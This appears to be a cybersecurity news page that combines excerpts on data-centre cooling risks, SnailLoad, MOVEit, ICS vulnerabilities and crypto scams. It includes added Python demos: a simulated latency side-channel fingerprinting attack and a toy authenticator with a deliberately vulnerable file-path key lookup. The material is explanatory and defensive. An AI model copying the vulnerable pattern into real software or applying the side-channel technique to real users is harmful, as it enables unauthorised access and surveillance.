Cybersecurity News and Magazine
Top 5 Skills to Future-Proof Your Career in the Artificial Intelligence Era
As Artificial Intelligence (AI) continues to transform industries worldwide, tech enthusiasts must equip themselves with the right skillsets to stay relevant and competitive. The swift evolution of AI technologies is altering job roles, opening up new career opportunities, and establishing benchmarks for the future of employment. Whether you're a budding developer or an experienced IT professional, mastering these key skills will enable you to excel in an AI-dominated environment.
Skills to Master in the Era of Artificial Intelligence
- Understanding the fundamentals of AI/ML - AI and ML are at the core of today’s technological innovations. From automating routine tasks to enabling sophisticated data analysis, these technologies are driving the next wave of digital transformation. A deep understanding of AI principles and machine learning techniques is crucial for anyone looking to future-proof their career. Aspirants must learn the basics of AI and its implementation in real-world scenarios.
- Building proficiency in Data Analysis - In the AI era, data is often called the new oil. The ability to analyse and interpret data is invaluable, because it forms the foundation for AI and machine learning models. Data science skills let tech enthusiasts derive actionable insights from large datasets and drive informed decision-making. Aspirants should focus on the key statistical methods for analysing data, including regression, hypothesis testing and probability, and build proficiency in data visualization tools such as Tableau, Matplotlib and Seaborn.
- Learn advanced programming skills - Programming remains a fundamental skill in the tech world, and as AI evolves the demand for advanced programming skills is rising quickly. Tech enthusiasts need to write efficient, scalable code to build complex AI systems and applications. Aspirants should gain expertise in Python, which is widely used in AI and ML, and a good understanding of languages such as Java, C++ and JavaScript. They should also become proficient in algorithms and data structures and their application to problem-solving.
- Cloud Computing and AI Integration - Cloud computing has revolutionized the way we build and deploy AI solutions. Understanding how to leverage cloud platforms is crucial for developing scalable AI applications and managing big data.
- Cybersecurity Awareness and Skills - As AI systems become more integrated into daily life, robust cybersecurity becomes increasingly important. Cybersecurity skills are essential for protecting data, ensuring the integrity of AI systems and mitigating cyber threats. Aspirants keen to build these skills should begin with the basics: threat modelling, encryption and network security. They should also learn about the security challenges specific to AI systems, such as adversarial attacks (inputs crafted to make a model misbehave) and data poisoning (tampering with the data a model is trained on).
Conclusion
The AI era presents both challenges and opportunities for tech enthusiasts. By developing these essential skills, you can future-proof your career. Embrace the continuous learning journey, stay curious, and keep adapting to the advancements in AI and related technologies.
Challenges Faced By Data Centers In Adopting Liquid Cooling
Cybersecurity Risks of Data Center Liquid Cooling Systems
Liquid cooling systems — while enhancing efficiency in data centers — introduce cybersecurity challenges demanding attention from industry experts. These systems present new vulnerabilities that malicious actors can exploit.
Data Breaches
Attackers can intercept and manipulate sensor data in liquid cooling systems by exploiting vulnerabilities in the interconnected IoT devices that monitor and control them. With unauthorized access, they can alter critical sensor readings, disrupt temperature regulation and cause hardware damage or system shutdowns. According to one recent survey, 36% of respondents reported that their worst breach in the past three years cost $1 million or more, which underscores the financial stakes of such attacks. The interconnectedness of these systems amplifies the risk: a compromised sensor or controller can serve as a gateway to broader network infiltration, with widespread operational and security consequences for the data center.
Network Vulnerabilities
IoT devices in data center liquid cooling systems can be entry points for cyberattacks because of their connectivity and often insufficient security. Attackers can exploit these devices, which are integral to monitoring and managing cooling processes, to reach the broader network. One widely cited survey reports that 93% of external cyberattacks successfully breach organizational networks and access information within IoT systems, illustrating how prevalent the risk is. The remote access and control features of these cooling systems are another significant exposure: an unauthorized party who reaches the management interface can change settings, disrupt operations and cause physical damage, compromising the data center's overall security and functionality.
Malware and Ransomware
Malware can significantly disrupt cooling operations by targeting the control systems that regulate temperature and manage liquid flow. Once these systems are infected, malware can alter operational parameters and cause overheating or shutdowns, leading to critical failures. In 2023, organizations worldwide detected over 317 million ransomware attempts according to one vendor's telemetry, highlighting the persistent threat. Ransomware against liquid cooling controls is particularly concerning because an attacker can shut the cooling system off and demand payment to restore it. Such disruptions threaten the data center's physical integrity and carry severe financial and operational risk, which makes it imperative for organizations to strengthen their defenses against these threats.
Physical Risks of Data Center Liquid Cooling Systems
While cybersecurity threats are a significant concern, the physical risks associated with liquid cooling systems are equally critical. The following examples can severely impact data center operations.
Environmental Threats
Cooling system failures can lead to rapid temperature increases that jeopardize sensitive hardware. Excessive heat can cause servers and other critical equipment to malfunction or fail, resulting in data loss and significant downtime. Contaminants entering the liquid loop, such as particulate matter or chemical impurities, can clog or corrode essential parts and further increase the risk of hardware damage. These issues threaten the physical health of the infrastructure and lead to costly repairs and replacements, which underscores the importance of keeping cooling systems robust and clean.
Hardware Failures
Liquid leaks in data centers pose significant risks of hardware damage and data loss. For instance, a water leak in a battery room at Global Switch's data center in Paris sparked a fire that disrupted Google Cloud's Paris region (europe-west9) for days in April 2023. Such leaks can cause short circuits, corrosion and other physical damage to critical components, leading to substantial downtime and financial loss. Maintaining liquid cooling systems involves complex procedures, including regular inspections, leak detection and fluid replacement, each of which carries its own risks; improper maintenance or an undetected leak can escalate into a severe incident. This highlights the need for rigorous protocols and advanced monitoring to safeguard against these threats and ensure reliability.
Physical Security
Physical tampering with liquid cooling systems presents significant security risk, as unauthorized alterations can disrupt operations and compromise system integrity. Malicious insiders, such as disgruntled employees or contractors with access, can exploit their physical access to change settings, introduce contaminants or switch off cooling. Such actions can lead to overheating, hardware failures and extended downtime. The potential for insider threats underscores the need for strict access controls, thorough background checks and continuous monitoring of personnel activity, so that attempts at physical sabotage are prevented or quickly detected.
Mitigation Strategies
Addressing the security threats to data center liquid cooling systems requires a multifaceted approach. The following measures can significantly reduce risk and protect system integrity.
Physical Security Measures
Design improvements are crucial to minimize leakage and damage. Precision linear-motion components that position parts of the system accurately improve efficiency while reducing the likelihood of leaks, and robust sealing technologies and materials further mitigate the risk of fluid escape. Advanced environmental monitoring is also advisable, because it provides real-time data on temperature, humidity and potential contaminants and allows prompt detection of and response to anomalies. These proactive measures keep cooling operations reliable and safe, protecting critical infrastructure.
Cybersecurity Measures
Securing the IoT devices and network endpoints in liquid cooling systems means applying familiar best practices: robust encryption and authentication of telemetry and control traffic, regular firmware updates and strong authentication on management interfaces. Network segmentation isolates the cooling control network from business IT and from the internet, and any vendor remote access should pass through a monitored jump host rather than a directly exposed controller. Continuous monitoring and auditing are essential to detect and respond to incidents promptly: real-time analytics and intrusion detection can surface anomalies such as sensor readings that are physically implausible or control commands from unexpected sources. Regular audits reinforce security by identifying vulnerabilities and verifying compliance with security policies.
Prioritizing the Security of Data Center Liquid Cooling Systems
Industry experts must prioritize robust security measures and remain vigilant about evolving threats to ensure the resilience of liquid cooling systems. Future advances in AI-driven monitoring and smart materials promise to further improve the safety and efficiency of these systems and mitigate security risks.
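The mitigation section above recommends authenticating telemetry, segmenting networks and monitoring for anomalies. The following Python gateway is an added example, not code from the article or from any cooling vendor: it verifies an HMAC tag on each sensor frame, rejects replays by sequence number, and cross-checks readings that verify but are physically implausible, which is what a spoofed or physically tampered sensor produces. The device ID, field names, thresholds and sample frames are all constructed assumptions.

```python
"""Authenticated, plausibility-checked telemetry for a liquid-cooling loop.

Added example, not code from the article or from any vendor: a gateway that
receives JSON sensor frames from loop controllers, rejects frames whose HMAC
tag does not verify or whose sequence number goes backwards (replay), and flags
frames that verify but are physically implausible (the kind of reading a
spoofed or physically tampered sensor produces). Device IDs, field names,
thresholds and the sample frames below are constructed assumptions.
"""
import hashlib
import hmac
import json

# Assumption: one shared secret per controller, provisioned out of band.
DEVICE_KEYS = {"loop-01": b"example-shared-secret-loop-01"}

MAX_DELTA_C_PER_SAMPLE = 3.0   # assumed: inlet temperature cannot jump more than 3 C between samples
MIN_OUTLET_MINUS_INLET = 0.5   # assumed: with the pump running, outlet must be at least 0.5 C warmer


def sign_frame(device_id, frame):
    """Controller side: canonical JSON body plus an HMAC-SHA256 tag."""
    body = json.dumps(frame, sort_keys=True, separators=(",", ":")).encode()
    tag = hmac.new(DEVICE_KEYS[device_id], body, hashlib.sha256).hexdigest()
    return body, tag


def verify_frame(device_id, body, tag):
    """Gateway side: constant-time tag check; unknown devices never verify."""
    key = DEVICE_KEYS.get(device_id)
    if key is None:
        return False
    expected = hmac.new(key, body, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tag)


def plausibility_alerts(prev, cur):
    """Cross-check readings against each other and against the previous frame."""
    alerts = []
    if prev is not None and abs(cur["coolant_in_c"] - prev["coolant_in_c"]) > MAX_DELTA_C_PER_SAMPLE:
        alerts.append("inlet temperature jumped")
    if cur["pump_rpm"] > 0 and cur["coolant_out_c"] - cur["coolant_in_c"] < MIN_OUTLET_MINUS_INLET:
        alerts.append("no heat pickup while pump running")
    if cur["pump_rpm"] == 0 and cur["flow_lpm"] > 0.1:
        alerts.append("flow reported with pump stopped")
    return alerts


def process(device_id, messages):
    """Return (seq, status, alerts) per message; status is ok, alert,
    rejected_bad_tag or rejected_replay."""
    results = []
    prev = None
    for body, tag in messages:
        if not verify_frame(device_id, body, tag):
            results.append((None, "rejected_bad_tag", []))
            continue
        frame = json.loads(body)
        if prev is not None and frame["seq"] <= prev["seq"]:
            results.append((frame["seq"], "rejected_replay", []))
            continue
        alerts = plausibility_alerts(prev, frame)
        results.append((frame["seq"], "alert" if alerts else "ok", alerts))
        prev = frame
    return results


# Constructed telemetry, not captured from any real system.
SAMPLE_FRAMES = [
    {"seq": 1, "coolant_in_c": 25.0, "coolant_out_c": 33.5, "flow_lpm": 40.0, "pump_rpm": 2900},
    {"seq": 2, "coolant_in_c": 25.4, "coolant_out_c": 34.0, "flow_lpm": 40.2, "pump_rpm": 2900},
    # Outlet barely warmer than inlet at full pump speed: a spoofed sensor, not physics.
    {"seq": 3, "coolant_in_c": 25.3, "coolant_out_c": 25.4, "flow_lpm": 40.1, "pump_rpm": 2900},
]


def build_demo_messages():
    """Legitimate frames plus one in-transit tamper and one replay."""
    msgs = [sign_frame("loop-01", f) for f in SAMPLE_FRAMES]
    body, tag = msgs[1]
    # Attacker on the path rewrites the inlet temperature but cannot recompute the tag.
    msgs.insert(2, (body.replace(b'"coolant_in_c":25.4', b'"coolant_in_c":20.0'), tag))
    # A stale but validly signed frame resent later.
    msgs.append(msgs[0])
    return msgs


if __name__ == "__main__":
    for seq, status, alerts in process("loop-01", build_demo_messages()):
        print(seq, status, alerts)
```

The tag check catches modification on the wire and the sequence check catches replay, but neither helps when the sensor itself is spoofed; that is what the physics cross-checks are for, and they are the part you tune per loop. In a real deployment the shared secret would live in the controller's secure element and the thresholds would come from the loop's commissioning data.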
SnailLoad Allows Attackers to Trace Visited Websites By Measuring Network Latency
How The SnailLoad Exploit Works
SnailLoad takes advantage of the bandwidth bottleneck present in most internet connections. When a user's device communicates with a server, the last mile of the connection is typically much slower than the server's uplink, so that is where packets queue. An attacker who keeps a slow stream of packets flowing to the victim can measure the round-trip delay of those packets and deduce when the victim's connection is busy. [Image: Source: snailload.com] The attack masquerades as a download of a file or of any website component (a style sheet, a font, an image or an advertisement). The attacking server sends the file at a snail's pace so that it can monitor the connection's latency over an extended period. The researchers named the technique 'SnailLoad' because, "apart from being slow, SnailLoad, just like a snail, leaves traces and is a little bit creepy." The attack requires no JavaScript or code execution on the victim's system; it only requires that the victim load content from an attacker-controlled server that sends data extremely slowly. By monitoring latency over time and correlating the resulting trace with reference traces, the attacker can match it to specific online activities. The researchers list the conditions required for the attack:
- The victim communicates with the attack server.
- The attacker's server has a faster internet connection than the victim's last mile.
- Packets the attacker sends to the victim are delayed whenever the last mile is busy.
- From the delay pattern, the attacker infers which website was visited or which video was watched (a side channel).
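The four conditions above can be simulated end to end. The Python below is an added example, not code from the SnailLoad researchers: it models the victim's last mile as a single FIFO queue that the victim's own downloads and the attacker's slow drip of probe packets share, records the round-trip time each probe sees, and then matches that trace against reference traces for a handful of candidate sites by Pearson correlation. The link speed, probe rate, burst shapes and site names are constructed assumptions; no real site profiles are used.

```python
"""SnailLoad-style latency side channel, simulated end to end.

Added example, not code from the SnailLoad researchers: a discrete-time model
of a victim's last-mile bottleneck shared by (a) the victim's own downloads and
(b) an attacker's slow drip of packets. Each attacker packet that arrives while
the bottleneck queue holds victim bytes is delayed, so the attacker's
round-trip-time trace mirrors the victim's traffic pattern. A correlation
classifier then matches that trace against reference traces for known sites.
Link speed, probe rate, burst shapes and the site names are constructed
assumptions; no real site profiles are used.
"""
import math
import random

LINK_BYTES_PER_MS = 2500   # assumed 20 Mbit/s last mile
PROBE_INTERVAL_MS = 10     # attacker sends one small packet every 10 ms
PROBE_BYTES = 100
BASE_RTT_MS = 20.0
DURATION_MS = 2000


def make_site_profile(seed):
    """Constructed per-site download pattern: bytes arriving at the bottleneck per ms."""
    rng = random.Random(seed)
    arrivals = [0] * DURATION_MS
    for _ in range(rng.randint(3, 6)):          # a few object bursts per page load
        start = rng.randint(0, DURATION_MS - 100)
        size = rng.randint(200_000, 600_000)    # one object of 200-600 KB
        burst_ms = rng.randint(1, 4)            # arrives faster than the link can drain it
        for t in range(start, start + burst_ms):
            arrivals[t] += size // burst_ms
    return arrivals


def attacker_trace(victim_arrivals, jitter_ms=0.0, seed=0):
    """RTT of each attacker probe while the victim's bytes share the same FIFO queue."""
    rng = random.Random(seed)
    backlog = 0.0
    trace = []
    for t in range(DURATION_MS):
        backlog += victim_arrivals[t]
        if t % PROBE_INTERVAL_MS == 0:
            queueing_delay = backlog / LINK_BYTES_PER_MS
            trace.append(BASE_RTT_MS + queueing_delay + rng.gauss(0.0, jitter_ms))
            backlog += PROBE_BYTES
        backlog = max(0.0, backlog - LINK_BYTES_PER_MS)   # link drains at line rate
    return trace


def correlation(a, b):
    """Pearson correlation between two equal-length traces."""
    n = len(a)
    ma, mb = sum(a) / n, sum(b) / n
    cov = sum((x - ma) * (y - mb) for x, y in zip(a, b))
    sa = math.sqrt(sum((x - ma) ** 2 for x in a))
    sb = math.sqrt(sum((y - mb) ** 2 for y in b))
    return cov / (sa * sb) if sa and sb else 0.0


# Attacker's offline preparation: one reference trace per candidate site.
SITES = {name: make_site_profile(seed) for name, seed in
         [("site-A", 1), ("site-B", 2), ("site-C", 3), ("site-D", 4)]}
REFERENCE = {name: attacker_trace(profile) for name, profile in SITES.items()}


def classify(observed):
    """Return the best-matching site and all correlation scores."""
    scores = {name: correlation(observed, ref) for name, ref in REFERENCE.items()}
    return max(scores, key=scores.get), scores


def demo(site="site-C", jitter_ms=1.0):
    """Victim loads `site` while the attacker measures through 1 ms of RTT jitter."""
    observed = attacker_trace(SITES[site], jitter_ms=jitter_ms, seed=42)
    return classify(observed)


if __name__ == "__main__":
    guess, scores = demo()
    print("guess:", guess, {k: round(v, 3) for k, v in scores.items()})
```

Raising `jitter_ms` in `demo` is the simulated counterpart of the noise-based mitigation the researchers mention: classification degrades as jitter approaches the size of the queueing delays, which for a fast bottleneck and small objects is not much. The model ignores TCP dynamics and cross traffic, so real accuracy is lower than this toy suggests; the point is only that the attacker never needs anything from the victim beyond a slow download.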
SnailLoad Implications and Mitigation
In testing, SnailLoad identified which YouTube video a victim was watching with up to 98% accuracy and fingerprinted websites from the top-100 list with 62.8% accuracy. It has not been observed in the wild, but it could potentially affect most internet connections. Mitigation is difficult because the root cause is the bandwidth asymmetry built into network infrastructure: the researchers note that adding random noise to the network reduces the attack's accuracy but costs performance and inconveniences users. SnailLoad shows that even encrypted traffic can leak information through subtle timing differences, and further research will be needed to develop effective countermeasures against this class of remote side-channel attack.
Researchers Uncover Flaws in Widely Used Emerson Rosemount Industrial Gas Chromatographs
Flaws in Emerson Rosemount Gas Chromatographs
Operational technology security firm Claroty discovered the vulnerabilities, which include two command injection flaws and two authentication bypass issues. If exploited, they could let unauthenticated attackers run arbitrary commands, access sensitive data and gain administrative control. [Image: Source: Wikipedia] [Image: Emulated system (Source: claroty.com)] To study the Emerson Rosemount 370XA gas chromatograph, commonly used in industrial settings for gas analysis, the researchers emulated the device rather than buying one: a physical unit can cost over $100,000, and the research was limited to a six-week project. The emulation involved downloading and extracting the device firmware from the official Emerson Rosemount website and locating the application that implements its proprietary protocols. The researchers then used the QEMU emulator to run the extracted firmware on the PowerPC architecture the chromatograph uses. Their investigation uncovered four vulnerabilities:
- CVE-2023-46687: Allows remote execution of root-level commands without authentication (CVSS score: 9.8)
- CVE-2023-49716: Enables authenticated users to run arbitrary commands remotely (CVSS score: 6.9)
- CVE-2023-51761: Permits unauthenticated users to bypass authentication and gain admin access by resetting passwords (CVSS score: 8.3)
- CVE-2023-43609: Allows unauthenticated users to access sensitive information or cause denial-of-service (CVSS score: 6.9)
Industry Impact and Mitigation
Gas chromatographs play a crucial role in sectors from environmental monitoring to medical diagnostics, so compromised devices could have far-reaching consequences. In food processing, an attack on a chromatograph might prevent accurate bacteria detection and halt production; in healthcare settings, disrupted blood sample analysis could affect patient care. Emerson has released updated firmware addressing these vulnerabilities, and the Claroty researchers said they "appreciate Emerson for its swift response and cooperation, which demonstrates their dedication to our shared goal." Emerson advises customers to apply the patches and follow current cybersecurity best practices, stating: "In addition, Emerson recommends end users continue to utilize current cybersecurity industry best practices and in the event such infrastructure is not implemented within an end user's network, action should be taken to ensure the Affected Product is connected to a well-protected network and not connected to the Internet." In its advisory, CISA shared the following recommendations for securing these systems:
- Minimize network exposure: Ensure that control system devices and/or systems are not publicly accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- Secure remote access: When remote access is required, use secure methods such as Virtual Private Networks (VPNs), while recognizing that VPNs may have vulnerabilities of their own, should be kept updated, and are only as secure as the devices connected to them.
Scammers Promoted Fake Donald Trump Live Stream Urging Cryptocurrency Donations During Presidential Debate
Fake Trump Cryptocurrency Promotion Scam Streamed Ahead of Presidential Debate
The fake live stream coincided with this week's scheduled debate between U.S. President Joe Biden and former President and challenger Donald J. Trump. The scammers appeared to be trading on Trump's past statements in support of cryptocurrency, paired with a looped AI-generated video in which he sits alongside the YouTuber Logan Paul and speaks about promoting cryptocurrency in the United States if elected. [Image: Screenshot taken from the livestream] The fake video appears to be edited from a podcast episode in which Trump joined the YouTuber to discuss the election, U.S. politics, his personal life and his opponent. The edited video displayed a QR code and a website (donaldtrump[.]gives) where viewers could be tricked into donating. The site uses official Trump 2024 campaign branding and offers instructions for taking part in the "unique event," a multiplier that shows visitors how much cryptocurrency they would supposedly receive in return for their donation, and a "live" feed of donations to the listed cryptocurrency addresses. [Image: Cryptocurrency addresses involved with the scam] "During this unique event, you have the opportunity to take a share of 2,000 BTC & 50,000 ETH & 500,000,000 DOGE & 50,000,000 USDT. Have a look at the rules and don't miss out on this. You can only participate once!" the scam website stated. According to a WHOIS lookup, the domain was registered on June 27, the day of the debate, with a Russian registrant.
YouTube Channel Connected To Scam Taken Down
The YouTube channel behind the promotion was taken down shortly after it was reported to YouTube, but the website promoted during the stream still appeared to be up and running. The channel had about 1.38 million subscribers before its takedown, nearly half the subscriber count (2.9 million) of the official Donald J. Trump YouTube channel. [Image: Email confirmation of channel takedown] It is unknown whether the live transaction feed on the scam site reflects real transactions. The full extent of the scam and the number of victims are unknown; details of the campaign have been sent to Cyble Research and Intelligence Labs (CRIL) for further investigation. [Image: Screenshot of alleged transactions] The campaign highlights the threat that AI-generated content poses to election-related processes and legitimate campaign fundraising through impersonation of candidates and other well-known figures. In a recent incident, crypto scammers took over the YouTube channel of Channel 7 News Australia and used a deepfake of Elon Musk to promote dubious crypto investments.
Data Security Officer from Philippines Admits to Hacking 93 Different Websites
Implications for Philippines National Security
Kangkong's hacking spree exposed significant weaknesses in the security of various organizations. High-profile targets included the peacekeeping operations center website of the Armed Forces of the Philippines, the mail server of the National Security Council, and the Join the PH Army website. The hacker and two other individuals were arrested by the National Bureau of Investigation (NBI) Cybercrime Division on June 19 after reports of multiple unauthorized access attempts and breaches. [Image: Arrested data officer Kangkong (Source: www.onenews.ph)] The hacker acknowledged the serious consequences of his actions, including the potential exposure of soldiers' sensitive data to foreign entities. "That's when I realized that we have many enemies and we should not be going against each other," Kangkong stated. In an interview with ABS-CBN, he said he had left specific pictures on compromised websites as proof of his involvement.
Senior Technology Officer May Be Implicated
In his extrajudicial confession, Kangkong initially named Art Samaniego, Manila Bulletin's senior technology officer, as the person who ordered the hacking of several websites, a claim he later expressed regret for. Samaniego has denied allegations that he ordered the hacking to boost his social media reach. The NBI Cybercrime Division has issued a subpoena for Samaniego to explain his side, and the Manila Bulletin has suspended him pending an internal investigation. Kangkong also pointed to the inadequate security of government and private-sector websites as a key factor in his ability to breach them. "Cybersecurity is not really a priority in the Philippines," he stated, urging organizations to invest in better security measures despite the cost.
Recently Disclosed Progress MOVEit Transfer Flaw Observed Being Actively Exploited
Progress MOVEit Vulnerability Details
watchTowr Labs was sent details of the vulnerability by a user identifying as 'dav1d_bl41ne' on its IRC channel, an unusual route for vulnerability sharing, the researchers noted. They decided to investigate further and set up a test environment to reproduce it. [Image: Source: labs.watchtowr.com] Debugger output from the test environment showed the server throwing exceptions and attempting to access files in unexpected ways. On further investigation, the researchers found that the vulnerability could be triggered by supplying a file path in place of an SSH public key during authentication, which caused the server to read that file as the key and gave the attacker unauthorized access. The researchers described the exploitation steps as follows:
- Upload a public key to the file transfer server.
- Rather than supplying a legitimate public key, send the file path of the uploaded key, and sign the authentication request with the corresponding private key.
- The server accepts the key and the login succeeds, allowing access to the target files.
Recommended mitigations include:
- Block public inbound RDP access to MOVEit Transfer server(s).
- Limit outbound access on MOVEit Transfer server(s) to only trusted endpoints.
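The three steps above describe a bug class rather than a single line of code: a server that lets the client name the file its trust decision will be read from. The Python below is an added example, not MOVEit Transfer code and not the watchTowr proof of concept, that models that class with a toy key-based authenticator. The vulnerable variant joins the client's key reference onto the account's key directory without confining it, so an absolute path to a file the attacker was able to upload makes the server verify the login against the attacker's own key; the hardened variant accepts only a bare key identifier and checks that the resolved path stays inside the account's directory. The directory layout, user names, challenge and the textbook-RSA signatures with fixed small primes are all assumptions made so the example runs offline; the RSA is illustrative, not a usable signature scheme.

```python
"""A public-key reference that is really a file path, modelled as a toy server.

Added example, not MOVEit Transfer code and not the watchTowr proof of concept:
a minimal SFTP-like authenticator that identifies the client's key by a
reference string. The vulnerable variant joins that reference onto the
account's key directory without confining it, so an absolute path to any file
the attacker was able to place on the server (here, an upload directory) makes
the server verify the login against the attacker's own key. The hardened
variant accepts only a bare key identifier and checks that the resolved path
stays inside the account's key directory. Signatures use textbook RSA with
small fixed primes so the example is self-contained; that is an illustration
only, not a usable signature scheme.
"""
import hashlib
import os
import re
import tempfile

# Toy RSA parameters (assumption: small primes chosen for readability, not security).
ALICE_PRIMES = (1000003, 1000033)
MALLORY_PRIMES = (1000037, 1000039)
PUBLIC_EXPONENT = 65537


def keygen(primes):
    p, q = primes
    n = p * q
    d = pow(PUBLIC_EXPONENT, -1, (p - 1) * (q - 1))
    return {"n": n, "e": PUBLIC_EXPONENT}, {"n": n, "d": d}


def _digest(challenge, n):
    return int.from_bytes(hashlib.sha256(challenge).digest(), "big") % n


def sign(priv, challenge):
    return pow(_digest(challenge, priv["n"]), priv["d"], priv["n"])


def verify(pub, challenge, sig):
    return pow(sig, pub["e"], pub["n"]) == _digest(challenge, pub["n"])


def encode_pub(pub):
    return f"toy-rsa {pub['n']}:{pub['e']}\n"


def decode_pub(blob):
    m = re.fullmatch(r"toy-rsa (\d+):(\d+)", blob.strip())
    if not m:
        raise ValueError("malformed key blob")
    return {"n": int(m.group(1)), "e": int(m.group(2))}


class KeyAuthServer:
    def __init__(self, key_dir):
        self.key_dir = key_dir   # layout: <key_dir>/<user>/<keyid>.pub

    def _key_path_vulnerable(self, user, key_ref):
        # BUG CLASS: os.path.join discards the base when key_ref is absolute, and
        # nothing stops '../' either, so the caller picks which file becomes the key.
        return os.path.join(self.key_dir, user, key_ref)

    def _key_path_hardened(self, user, key_ref):
        if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", key_ref):
            raise ValueError("key reference must be a bare identifier")
        base = os.path.realpath(os.path.join(self.key_dir, user))
        path = os.path.realpath(os.path.join(base, key_ref + ".pub"))
        if os.path.commonpath([base, path]) != base:
            raise ValueError("key reference escapes the account's key directory")
        return path

    def _check(self, path, challenge, sig):
        with open(path) as fh:
            return verify(decode_pub(fh.read()), challenge, sig)

    def auth_vulnerable(self, user, key_ref, challenge, sig):
        return self._check(self._key_path_vulnerable(user, key_ref), challenge, sig)

    def auth_hardened(self, user, key_ref, challenge, sig):
        try:
            return self._check(self._key_path_hardened(user, key_ref), challenge, sig)
        except (ValueError, OSError):
            return False


def demo():
    """Alice logs in with her enrolled key; Mallory points the server at a key
    she uploaded and signs with the matching private key. Returns both outcomes."""
    with tempfile.TemporaryDirectory() as root:
        key_dir = os.path.join(root, "keys")
        upload_dir = os.path.join(root, "uploads")     # assumption: attacker-writable
        os.makedirs(os.path.join(key_dir, "alice"))
        os.makedirs(upload_dir)
        alice_pub, alice_priv = keygen(ALICE_PRIMES)
        mallory_pub, mallory_priv = keygen(MALLORY_PRIMES)
        with open(os.path.join(key_dir, "alice", "laptop.pub"), "w") as fh:
            fh.write(encode_pub(alice_pub))
        planted = os.path.join(upload_dir, "mallory.pub")
        with open(planted, "w") as fh:
            fh.write(encode_pub(mallory_pub))

        server = KeyAuthServer(key_dir)
        challenge = b"session-nonce-0001"                  # constructed
        alice_sig = sign(alice_priv, challenge)
        mallory_sig = sign(mallory_priv, challenge)
        return {
            "alice_vulnerable": server.auth_vulnerable("alice", "laptop.pub", challenge, alice_sig),
            "alice_hardened": server.auth_hardened("alice", "laptop", challenge, alice_sig),
            "mallory_vulnerable": server.auth_vulnerable("alice", planted, challenge, mallory_sig),
            "mallory_hardened": server.auth_hardened("alice", planted, challenge, mallory_sig),
        }


if __name__ == "__main__":
    print(demo())
```

The signature in the vulnerable path is perfectly valid; the failure is that the server let the client choose which key to validate it against. Whatever key store a real product uses, the check to look for is that the key material comes only from the account's enrolment records and that nothing the client sends is ever interpreted as a filesystem location.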
Implications of the MOVEit Vulnerability
The discovery of this vulnerability so soon after last year's mass exploitation has reignited discussion about the security of file transfer solutions in enterprise environments. Unauthorized access to sensitive files could have far-reaching consequences for the many enterprises that rely on MOVEit Transfer. While the full impact is still being assessed, the incident has also renewed debate about responsible disclosure: some argue that early, private notification of affected parties is crucial, while others favor more transparent, public disclosure to ensure awareness and prompt action. IT administrators and security professionals are advised to stay vigilant, monitor for signs of exploitation, and apply the recommended measures to protect their MOVEit Transfer deployments.
Scammers Spotted Promoting Fake Olympics Cryptocurrency With AI Generated Imagery
Olympics Initial Coin Offerings (ICO) Fraud
Researchers from Trend Micro uncovered a recent scheme that claimed to offer an official "Olympics Games Token" for sale. The ICO website, theolympictoken[.]com, was registered on March 30, 2024, and went live a day later. It displayed the official Olympics 2024 logo and a countdown to the event to look like a legitimate project. [Image: Source: trendmicro.com] It also linked to a "whitepaper," the document that would normally explain the project's technology and goals, but the link simply sent visitors to the official Olympics website, a first red flag. A Twitter account and a Telegram channel pushed followers to buy tokens quickly. When the original site was shut down, a near-identical one (olympictokensolana[.]com) appeared under a new name. The researchers spotted at least ten other websites using 2024 Olympics branding to lure victims into ICO scams; some were shut down shortly after discovery.
Use of AI-Generated Images in Olympics ICO Scams
[Image: Source: trendmicro.com] The researchers remarked that AI-generated images are becoming increasingly common in ICO scams because they offer a cheap and fast way to create convincing lures. Cybercriminals also use AI to generate text, correct spelling and grammar, and write in languages they do not speak. [Image: Source: trendmicro.com] The researchers spotted at least three other Olympics ICO scam websites using AI-generated imagery for promotion.
Spotting Fake ICO Campaigns
ICOs have gained significant attention as cryptocurrency adoption spreads across industries. Most new tokens lack any utility and are simply memecoins, but that does not by itself make them scams; investors should nonetheless be vigilant about scams and rug-pulls. A legitimate ICO should have a proper website and social media presence, a transparent team, an active community, a comprehensive whitepaper, verifiable claims, sensible token distribution, a smart contract audit and responsible liquidity management. The researchers shared the following guidelines for identifying scams:
- Proper website and social media presence: Scam sites are often poorly designed or lack an active social media presence.
- Transparent team: Cross-check the identities and credentials of the teams behind the offering. Anonymity is a red flag.
- Active community: Genuine projects have engaged followers on platforms like Discord, Twitter or Telegram, which suggests genuine interest and support.
- Comprehensive whitepaper: A whitepaper that outlines the project's goals, utility, and technical aspects, which demonstrates a thorough understanding of the project's concept and planning.
- Legitimacy of claims: Claims backed by verifiable evidence, such as partnerships, use cases, and endorsements.
- Token distribution: Avoid projects with highly concentrated token ownership which might increase the chances of exit scams.
- Smart contract audit: An audit by a reputable third party that identifies vulnerabilities in the token contract.
- Liquidity management: Liquidity is locked to prevent premature withdrawals and is decentralized among the community, which secures investors' funds.
South Korean ISP Accused of Installing Malware on Devices of 600,000 Who Used Torrenting Services
Malware Infiltrated Systems of Torrenting Subscribers
The incident came to light in May 2020 when numerous Webhard (web hard drive) services suddenly stopped working and users flooded company forums with complaints about unexplained errors. An investigation found that malware had infiltrated the "Grid Program," the peer-to-peer component that lets users exchange data directly. [Image: Source: mnews.jtbc.co.kr] The malware, designed to interfere with BitTorrent-style traffic, was allegedly used to monitor and control the internet activity of KT subscribers. Police believe the motive was to reduce network costs, since peer-to-peer transfers are expensive for an internet service provider to carry. KT, however, says it was merely managing traffic on its network to ensure a smooth user experience and has characterized the Webhard services themselves as malicious. After the Gyeonggi Southern District Office raided KT facilities, investigators concluded the ISP may have violated communications and network laws. A follow-up police investigation stated that KT operated a dedicated team responsible for developing, distributing and operating the malware program, and traced the activity to KT's Bundang IDC Center, one of its data centers. Over five months, an estimated 20,000 PCs were infected daily. The malware reportedly created strange folders, made files invisible and disabled Webhard programs.
Legal and Ethical Implications
KT and Webhard companies have a history of conflict, including lawsuits. A previous court ruled in KT's favor regarding the blocking of grid-service traffic, but the current situation differs significantly: KT is alleged to have planted malicious code on individual users' PCs without consent or explanation. South Korean legal experts question KT's methods, suggesting the company could have pursued formal legal procedures instead of hacking. The incident raises serious concerns about privacy, corporate responsibility and how far an internet service provider may go to control network traffic. It has also raised concerns about the security of KT customers' data, with many wondering what other sensitive information may have been compromised. The company's CEO has since resigned, and the company's reputation has taken a significant hit.
Polyfill Supply Chain Attack Compromises Over 100,000 Websites
Malicious Polyfill Injection and Its Impact
